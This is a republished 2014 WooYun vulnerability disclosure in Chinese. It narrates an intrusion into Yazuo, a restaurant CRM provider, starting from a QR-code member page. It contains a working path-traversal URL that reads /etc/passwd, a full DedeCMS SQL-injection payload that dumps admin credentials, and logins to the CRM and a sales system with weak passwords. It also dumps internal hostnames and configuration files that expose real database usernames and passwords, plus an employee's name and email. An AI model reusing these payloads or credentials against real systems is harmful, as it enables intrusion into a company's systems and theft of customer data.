[公开漏洞]从一个二维码到雅座全线数据

从一个二维码到雅座全线数据 相关厂商： 雅座 漏洞作者：s0mun5 提交时间：2014-05-28 15:07 公开时间：2014-07-12 15:08 漏洞类型：成功的入侵事件 危害等级：高 自评Rank：20 漏洞状态： 未联系到厂商或者厂商积极忽略 漏洞来源：http://www.wooyun.org Tags标签： 无 漏洞详情 披露状态：

2014-05-28：积极联系厂商并且等待厂商认领中，细节不对外公开
2014-07-12：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

雅座，成立于2006年4月，是国内餐饮行业最大的CRM服务提供商。总部位于北京，已在全国50个城市设立了办事处。同时，在无锡iPark软件园建设了国内最大的餐饮数据储备中心，产品研发中心，客服中心和面向餐饮业提供专业管理培训的雅座商学院。



前两天出去吃饭走到一家新辣道门前服务员非得拉我扫二维码加会员，碍于不好拒绝就扫了一下，然后就有了这次的洞。

详细说明：

关注以后在微信里的会员页面如下

没有检测ua 在pc的浏览器上也可以打开

商家logo那里有任意文件读取

先收集信息备用

http://58.83.233.44/yazuo-weixin/weixin/phonePage/getImage.do?brandId=1119&name=../../../../../../etc/passwd



eth0

# Xen Virtual Ethernet

DEVICE=eth0

BOOTPROTO=none

ONBOOT=yes

HWADDR=2e:97:34:fd:02:b0

NETMASK=255.255.255.0

IPADDR=192.168.50.60

GATEWAY=192.168.50.254

TYPE=Ethernet

hosts

# Do not remove the following line, or various programs

# that require network functionality will fail.

127.0.0.1       localhost.localdomain localhost

::1localhost6.localdomain6 localhost6

#192.168.50.30      crmdb.yazuoyw.com

#192.168.50.60   WMSTradeServer

#192.168.56.40   www.backup.com

#192.168.49.50   tradedb.yazuoyw1.com

#192.168.50.50   crmdb.yazuoyw1.com

#192.168.49.30   tradedb.yazuoyw.com

#192.168.50.100     possys.yazuoyw.com



192.168.50.60   WMSTradeServer

192.168.49.30   tradedb.yazuoyw.com

192.168.49.55   bak.tradedb.yazuoyw.com

192.168.50.30   crmdb.yazuoyw.com

192.168.50.55   bak.crmdb.yazuoyw.com

192.168.49.210  crmapi.yazuoyw.com

192.168.49.210  possys.yazuoyw.com

192.168.49.210  webservice.yazuoyw.com

192.168.49.210  mq.yazuoyw.com

192.168.59.10   gp.yazuoyw.com

192.168.50.160  memcache1.yazuoyw.com

192.168.50.165  memcache2.yazuoyw.com

192.168.49.70   miralcedb.yazuoyw.com

扫描c断 大致确定是58.83.233.30-70



http://crm.yazuo.com/ 雅座crm 核心系统

http://58.83.233.61/index.htm 合同管理

http://58.83.233.57/index.html 销售管理

http://58.83.233.56/ ERP

http://www.yazuo.com/ 主站

http://58.83.233.44/yazuo-weixin/weixin/ 这个是在各个店里为微信扫码用的接口

漏洞证明：

先说比较重要的问题

主站是dedecms的 存在注入

http://www.yazuo.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294

文档的名称是：|nnwhko|4057d57572f1303b1bef

网址是：http://127.0.0.1:819=3

后台刚刚好就是这个用户名



http://www.yazuo.com/nnwhko/login.php?gotopage=%2Fnnwhko%2F



破解密码成功进入后台getshell

CRM系统无法注册，只能猜密码

凭借多年的人品 18888888888 密码123456 成功进入

刚好还是个管理员 太赞了

功能相当强大 可以管理会员各种信息 充值余额 发送短信等等等等

当然充值余额这个是最实用的



看看这一个连锁店的业绩 啧啧啧（后面进入ERP后发现有三四百家店 俏江南啊 呷哺呷哺啊 新辣道啊 什么很多知名的都有）

创建营销上传图片的地方成功gelshell

<VirtualHost *:80>

    DocumentRoot "/yazuo_apps/crm35/current/public/"

    ServerName crm.yazuo.com

    CustomLog "|cronolog /var/log/httpd/crm.yazuo.com/access_log.%Y%m%d " combined

    ErrorLog "|cronolog /var/log/httpd/crm.yazuo.com/error_log.%Y%m%d "

        <Directory "/yazuo_apps/crm35">

                Options FollowSymLinks

                AllowOverride all

                Order allow,deny

                Allow from all

        </Directory>

</VirtualHost>



#图片服务器

<VirtualHost *:80>

    DocumentRoot "/yazuo_apps/crm35/current/data/upload/"

    ServerName static.yazuo.com

    CustomLog "|cronolog /var/log/httpd/static.yazuo.com/access_log.%Y%m%d " combined

    ErrorLog "|cronolog /var/log/httpd/static.yazuo.com/error_log.%Y%m%d "

        <Directory "/yazuo_apps/crm35">

                Options FollowSymLinks

                AllowOverride all

                Order allow,deny

                Allow from all

        </Directory>

</VirtualHost>



#微信crm

<VirtualHost *:80>

    DocumentRoot "/yazuo_apps/weixin_crm/current/public/"

    ServerName weixincrm.yazuo.com

    CustomLog "|cronolog /var/log/httpd/weixin_crm/access_log.%Y%m%d " combined

    ErrorLog "|cronolog /var/log/httpd/weixin_crm/error_log.%Y%m%d "

        <Directory "/yazuo_apps/weixin_crm">

                Options FollowSymLinks

                AllowOverride all

                Order allow,deny

                Allow from all

        </Directory>

</VirtualHost>





#微信crm演示

<VirtualHost *:80>

    DocumentRoot "/yazuo_apps/weixin_crm_test/current/public/"

    ServerName 58.83.233.45

    CustomLog "|cronolog /var/log/httpd/weixin_crm_test/access_log.%Y%m%d " combined

    ErrorLog "|cronolog /var/log/httpd/weixin_crm_test/error_log.%Y%m%d "

        <Directory "/yazuo_apps/weixin_crm_test">

                Options FollowSymLinks

                AllowOverride all

                Order allow,deny

                Allow from all

        </Directory>

</VirtualHost>





<VirtualHost *:80>

    DocumentRoot "/yazuo_apps/yazuoapi"

    ServerName space.yazuosoft.com

    CustomLog "|cronolog /var/log/httpd/space.yazuosoft.com/access_log.%Y%m%d " combined

    ErrorLog "|cronolog /var/log/httpd/space.yazuosoft.com/error_log.%Y%m%d "

        <Directory "/yazuo_apps/yazuoapi">

                Options FollowSymLinks

                AllowOverride all

                Order allow,deny

                Allow from all

        </Directory>

</VirtualHost>





#memcached管理工具

<Directory "/yazuo_apps/memadmin">

Options FollowSymLinks

AllowOverride all

Order allow,deny

Allow from all

</Directory>



<VirtualHost *:80>

    DocumentRoot "/yazuo_apps/memadmin/"

    ServerName memadmin.yazuo.com

</VirtualHost>

配置文件太炫酷了 各种库的参数

db' => 

    array (

      'adapter' => 'PDO_PGSQL',

      'params' => 

      array (

        'host' => 'crmdb.yazuoyw.com',

        'port' => '5432',

        'username' => 'dev',

        'password' => 'devASDFZXCV',

        'dbname' => 'crm',

      ),

    ),

    'multidb' => 

    array (

      'db1' => 

      array (

        'adapter' => 'PDO_PGSQL',

        'host' => 'crmdb.yazuoyw.com',

        'port' => '5432',

        'username' => 'dev',

        'password' => 'devASDFZXCV',

        'dbname' => 'crm',

        'default' => '1',

      ),

      'db2' => 

      array (

        'adapter' => 'PDO_PGSQL',

        'host' => 'crmdb.yazuoyw.com',

        'port' => '5432',

        'username' => 'dev',

        'password' => 'devASDFZXCV',

        'dbname' => 'crm',

      ),

      'dbmsg' => 

      array (

        'adapter' => 'PDO_PGSQL',

        'host' => 'crmdb.yazuoyw.com',

        'port' => '5432',

        'username' => 'dev',

        'password' => 'devASDFZXCV',

        'dbname' => 'shortmessage',

      ),

      'dbtrade' => 

      array (

        'adapter' => 'PDO_PGSQL',

        'host' => 'tradedb.yazuoyw.com',

        'port' => '5432',

        'username' => 'oper',

        'password' => 'oper#EDC$RFV',

        'dbname' => 'trade',

      ),

      'dbweixin' => 

      array (

        'adapter' => 'PDO_PGSQL',

        'host' => 'crmdb.yazuoyw.com',

        'port' => '5432',

        'username' => 'weixin',

        'password' => 'weixinASDFZXCV',

        'dbname' => 'crm',

      ),

      'db70' => 

      array (

        'adapter' => 'PDO_PGSQL',

        'host' => 'crmdb.yazuoyw.com',

        'port' => '5432',

        'username' => 'trace',

        'password' => 'tracecrm',

        'dbname' => 'crm',

      ),

      'dbgp' => 

      array (

        'adapter' => 'PDO_PGSQL',

        'host' => 'gp.yazuoyw.com',

        'port' => '5432',

        'username' => 'dev',

        'password' => 'devASDFZXCV',

        'dbname' => 'crm',

      ),

      'dbweibo' => 

      array (

        'adapter' => 'PDO_PGSQL',

        'host' => 'gp.yazuoyw.com',

        'port' => '5432',

        'username' => 'weibo',

        'password' => 'weibogp',

        'dbname' => 'weibo_product',

      ),

      'dberp' => 

      array (

        'adapter' => 'PDO_PGSQL',

        'host' => '192.168.49.100',

        'port' => '5432',

        'username' => 'erp',

        'password' => 'erp',

        'dbname' => 'erp',

      ),





array (

        'email' => 'webadmin@yazuo.com',

        'name' => '雅座CRM标准版',

      ),

      'defaultReplyTo' => 

      array (

        'email' => 'songlixin@yazuo.com',

        'name' => '宋利新',

      ),

      'marketingReplyList' => 

      array (

        0 => 

        array (

          'email' => 'songlixin@yazuo.com',   (wooyun联系厂商的话 可以试试这个email)

          'name' => '宋利新',

        ),

        1 => 

        array (

          'email' => 'yingxiao@yazuo.com',

          'name' => '营销组',

        ),

      ),

剩下的不用说了 成功在weixin库里找到了自己的注册信息 当然还有余额之类的

数据量没有具体看 应该不少





下一个



http://58.83.233.57/index.html test/test弱口令成功进入 木有测试是否能getshell因为数据库已经拿到了

ERP啊之类的站的库在上面也能找到

管理员手机号1360130xxxx 也登陆成功

修复方案：

提醒一句 crm大部分用户的密码都是某个弱口令 这样不太好

版权声明：转载请注明来源 s0mun5@乌云

漏洞回应 厂商回应：

未能联系到厂商或者厂商积极拒绝

0

版权与免责声明：

凡注明稿件来源的内容均为转载稿或由网友用户注册发布，本网转载出于传递更多信息的目的；如转载稿涉及版权问题，请作者联系我们，同时对于用户评论等信息，本网并不意味着赞同其观点或证实其内容的真实性；

本文地址：https://top.cnzzla.com/artinfo/2415.html